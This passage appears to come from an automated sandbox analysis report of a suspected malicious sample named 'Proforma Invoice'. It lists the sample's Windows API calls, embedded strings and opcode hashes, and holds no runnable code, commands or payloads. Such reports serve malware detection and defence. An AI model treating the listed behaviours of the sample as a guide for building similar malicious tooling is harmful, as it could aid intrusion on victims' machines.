                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsnicmp
                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                • API String ID: 1038674560-1810252412
                                                                                                • Opcode ID: 2f9c79e3566d26ecda5d794bc53f13a18f7fe54391d2332771e6d4f4ff33a049
                                                                                                • Instruction ID: 96e8905585085ba2e5c4b796c2c8625f321b5306c87de3ed01dd7a9ed25241b6
                                                                                                • Opcode Fuzzy Hash: 2f9c79e3566d26ecda5d794bc53f13a18f7fe54391d2332771e6d4f4ff33a049
                                                                                                • Instruction Fuzzy Hash: 1531E5B1A4820DAADB48FAA4ED43EFE7767AF10711F20401DF906711D1EF956F08CA5A
                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00715013
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0071501E
                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00715029
                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00715034
                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 0071503F
                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 0071504A
                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00715055
                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00715060
                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 0071506B
                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00715076
                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00715081
                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0071508C
                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00715097
                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 007150A2
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 007150AD
                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 007150B8
                                                                                                • GetCursorInfo.USER32(?), ref: 007150C8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cursor$Load$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2577412497-0
                                                                                                • Opcode ID: be6c40d58a7e40908a21da5ba067c3f7e16b638d15924331068d27491772d427
                                                                                                • Instruction ID: b3652001fe09e58a9e9358e7ff13f89053e97648403fe272f93b53606cbf3f04
                                                                                                • Opcode Fuzzy Hash: be6c40d58a7e40908a21da5ba067c3f7e16b638d15924331068d27491772d427
                                                                                                • Instruction Fuzzy Hash: 873105B1D0831DAADB109FBA8C8999EBFE8FB04750F50452AA50CE7280DA7C65408E95
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0072A259
                                                                                                • DestroyWindow.USER32(?,?), ref: 0072A2D3
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0072A34D
                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0072A36F
                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0072A382
                                                                                                • DestroyWindow.USER32(00000000), ref: 0072A3A4
                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,006A0000,00000000), ref: 0072A3DB
                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0072A3F4
                                                                                                • GetDesktopWindow.USER32 ref: 0072A40D
                                                                                                • GetWindowRect.USER32(00000000), ref: 0072A414
                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0072A42C
                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0072A444
                                                                                                  • Part of subcall function 006A25DB: GetWindowLongW.USER32(?,000000EB), ref: 006A25EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                • String ID: 0$tooltips_class32
                                                                                                • API String ID: 1297703922-3619404913
                                                                                                • Opcode ID: a904cb1b332a67690afe0d36e833f8477bc251359f2f438d3f8141a503bf57f3
                                                                                                • Instruction ID: 674d520a5d9a6cccd52db369da1916451fc6bd8cdd89a49a4017bbeaeab45cc4
                                                                                                • Opcode Fuzzy Hash: a904cb1b332a67690afe0d36e833f8477bc251359f2f438d3f8141a503bf57f3
                                                                                                • Instruction Fuzzy Hash: 6871AB75140345AFD721DF28DC48F6A7BE6FB89700F04852CF986872A1C7B8E906DB66
                                                                                                APIs
                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00724424
                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0072446F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                • API String ID: 3974292440-4258414348
                                                                                                • Opcode ID: 2b59eb5a2fd8ac27288c5a1590f6bdbdb6b415c630ee6594f51e97440e8c6a36
                                                                                                • Instruction ID: 4bd9b92440fbac51025c46d3cce9114cc1d2e5d4e0488ee30af755f90e7437d5
                                                                                                • Opcode Fuzzy Hash: 2b59eb5a2fd8ac27288c5a1590f6bdbdb6b415c630ee6594f51e97440e8c6a36
                                                                                                • Instruction Fuzzy Hash: EC918C302043119FCB44EF20C851A6EB7E2AF96350F14886CF8965B3A2CB39ED59CB95
                                                                                                APIs
                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0072B8B4
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00726B11,?), ref: 0072B910
                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0072B949
                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0072B98C
                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0072B9C3
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0072B9CF
                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0072B9DF
                                                                                                • DestroyIcon.USER32(?), ref: 0072B9EE
                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0072BA0B
                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0072BA17
                                                                                                  • Part of subcall function 006C2EFD: __wcsicmp_l.LIBCMT ref: 006C2F86
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                • String ID: .dll$.exe$.icl
                                                                                                • API String ID: 1212759294-1154884017
                                                                                                • Opcode ID: 74fab5c5a45ba9ef242a986283afeb8167d2e94dba3490977470bb33f3a8437d
                                                                                                • Instruction ID: cdd8ef6d9e2d21df6685bae584251c7d3cdd57af90755ce986ff25f52aeadd77
                                                                                                • Opcode Fuzzy Hash: 74fab5c5a45ba9ef242a986283afeb8167d2e94dba3490977470bb33f3a8437d
                                                                                                • Instruction Fuzzy Hash: 5461CF71900229FAEB14DF64EC41FBE77B8EB08710F108529FE15D61D1DB78A981DBA0
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0070DCDC
                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0070DCEC
                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0070DCF8
                                                                                                • __wsplitpath.LIBCMT ref: 0070DD56
                                                                                                • _wcscat.LIBCMT ref: 0070DD6E
                                                                                                • _wcscat.LIBCMT ref: 0070DD80
                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0070DD95
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0070DDA9
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0070DDDB
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0070DDFC
                                                                                                • _wcscpy.LIBCMT ref: 0070DE08
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0070DE47
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                • String ID: *.*
                                                                                                • API String ID: 3566783562-438819550
                                                                                                • Opcode ID: 5969e01b1b3829239dd069d4b551bbed3d1346704ab2703b0cc760e2a9b986ab
                                                                                                • Instruction ID: d39655645a523379c3cbf5325938418d99725588594e2bebf68e4a774c64b7fe
                                                                                                • Opcode Fuzzy Hash: 5969e01b1b3829239dd069d4b551bbed3d1346704ab2703b0cc760e2a9b986ab
                                                                                                • Instruction Fuzzy Hash: 47614A725043059FCB20EF60C8449AFB3E9FF89314F04492EE98997291DB79ED45CBA6
                                                                                                APIs
                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00709C7F
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00709CA0
                                                                                                • __swprintf.LIBCMT ref: 00709CF9
                                                                                                • __swprintf.LIBCMT ref: 00709D12
                                                                                                • _wprintf.LIBCMT ref: 00709DB9
                                                                                                • _wprintf.LIBCMT ref: 00709DD7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                • API String ID: 311963372-3080491070
                                                                                                • Opcode ID: 6b95288e45f2ab3b5ef1fadd56555c9999cf3f5f352a3a9e574ec2b5ec786f1b
                                                                                                • Instruction ID: 40a128a21bfac9498abfbf1d41cf670599b4fba87d94fc46e6e279f29c349f38
                                                                                                • Opcode Fuzzy Hash: 6b95288e45f2ab3b5ef1fadd56555c9999cf3f5f352a3a9e574ec2b5ec786f1b
                                                                                                • Instruction Fuzzy Hash: AC51BD71900609AACB54FBE0CD42EEEB77AEF05300F504169F506721A2EB792E49DF68
                                                                                                APIs
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0070A3CB
                                                                                                • GetDriveTypeW.KERNEL32 ref: 0070A418
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0070A460
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0070A497
                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0070A4C5
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                • API String ID: 2698844021-4113822522
                                                                                                • Opcode ID: be8987642b50de350b7c422067fba0a9dd12753b008e8b2a278051476f5f001d
                                                                                                • Instruction ID: 65bcf15a97dd4756ae1ac61d0e501e965dec981238d063cf0d542f886c94eac1
                                                                                                • Opcode Fuzzy Hash: be8987642b50de350b7c422067fba0a9dd12753b008e8b2a278051476f5f001d
                                                                                                • Instruction Fuzzy Hash: 7A518D711043049FC780EF24C88196BB3E5EF89718F10896DF896672A1DB75ED0ACF96
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,006DE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 006FF8DF
                                                                                                • LoadStringW.USER32(00000000,?,006DE029,00000001), ref: 006FF8E8
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,006DE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 006FF90A
                                                                                                • LoadStringW.USER32(00000000,?,006DE029,00000001), ref: 006FF90D
                                                                                                • __swprintf.LIBCMT ref: 006FF95D
                                                                                                • __swprintf.LIBCMT ref: 006FF96E
                                                                                                • _wprintf.LIBCMT ref: 006FFA17
                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006FFA2E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                • API String ID: 984253442-2268648507
                                                                                                • Opcode ID: 503feb13a8f389b78834f3ce26ccda3de16422ba8120d658add40bb1647e4a2d
                                                                                                • Instruction ID: d396c822e73c2b5e5ab374668aeebb4240aa602e56e556987eef40799a90007b
                                                                                                • Opcode Fuzzy Hash: 503feb13a8f389b78834f3ce26ccda3de16422ba8120d658add40bb1647e4a2d
                                                                                                • Instruction Fuzzy Hash: C3414E7280020DAACB44FBE0DD46EFEB77AAF15300F500069F60676192EA756F09CF69
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0072BA56
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0072BA6D
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0072BA78
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0072BA85
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0072BA8E
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0072BA9D
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0072BAA6
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0072BAAD
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0072BABE
                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00732CAC,?), ref: 0072BAD7
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0072BAE7
                                                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 0072BB0B
                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0072BB36
                                                                                                • DeleteObject.GDI32(00000000), ref: 0072BB5E
                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0072BB74
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 3840717409-0
                                                                                                • Opcode ID: 3c2a55b89c70073bcdbcbe87b5cba36dd003e1dad0297f35b624da124a045739
                                                                                                • Instruction ID: 2512b07de20234786944f9feeaa430d609d5bb22df04cb1025b76705c6b0a9a6
                                                                                                • Opcode Fuzzy Hash: 3c2a55b89c70073bcdbcbe87b5cba36dd003e1dad0297f35b624da124a045739
                                                                                                • Instruction Fuzzy Hash: 35413A75600218EFDB219F65EC88EAEBBB8FF89711F108068F905D7260D7789D02CB64
                                                                                                APIs
                                                                                                • __wsplitpath.LIBCMT ref: 0070DA10
                                                                                                • _wcscat.LIBCMT ref: 0070DA28
                                                                                                • _wcscat.LIBCMT ref: 0070DA3A
                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0070DA4F
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0070DA63
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0070DA7B
                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0070DA95
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0070DAA7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                • String ID: *.*
                                                                                                • API String ID: 34673085-438819550
                                                                                                • Opcode ID: 26ade9e8205b5e30af3827cad069c779ef38601700421289d944de7052b09924
                                                                                                • Instruction ID: 797040ee63ee944bdddbbe51b7f60b17af4dbd56371ef56182858ea79945dcde
                                                                                                • Opcode Fuzzy Hash: 26ade9e8205b5e30af3827cad069c779ef38601700421289d944de7052b09924
                                                                                                • Instruction Fuzzy Hash: 178174B1514341DFCB74EFA4C84496AB7E9EF85310F148A2EF889C7291E638ED45CB52
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0072C1FC
                                                                                                • GetFocus.USER32 ref: 0072C20C
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0072C217
                                                                                                • _memset.LIBCMT ref: 0072C342
                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0072C36D
                                                                                                • GetMenuItemCount.USER32(?), ref: 0072C38D
                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0072C3A0
                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0072C3D4
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0072C41C
                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0072C454
                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0072C489
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 1296962147-4108050209
                                                                                                • Opcode ID: c8921add34e1c8ee5bfbd6ab714a039cad0d254208a3764d88232272ef5c4059
                                                                                                • Instruction ID: f1d8dd077a9b808c116357b37667cde8d83c6dc54ae7e627b9b57b0175ac6bc0
                                                                                                • Opcode Fuzzy Hash: c8921add34e1c8ee5bfbd6ab714a039cad0d254208a3764d88232272ef5c4059
                                                                                                • Instruction Fuzzy Hash: 6C81BE702083619FD721DF14E994A6FBBE8FF98314F104A2EF99597291C738D905CBA2
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 0071738F
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0071739B
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 007173A7
                                                                                                • SelectObject.GDI32(00000000,?), ref: 007173B4
                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00717408
                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00717444
                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00717468
                                                                                                • SelectObject.GDI32(00000006,?), ref: 00717470
                                                                                                • DeleteObject.GDI32(?), ref: 00717479
                                                                                                • DeleteDC.GDI32(00000006), ref: 00717480
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0071748B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
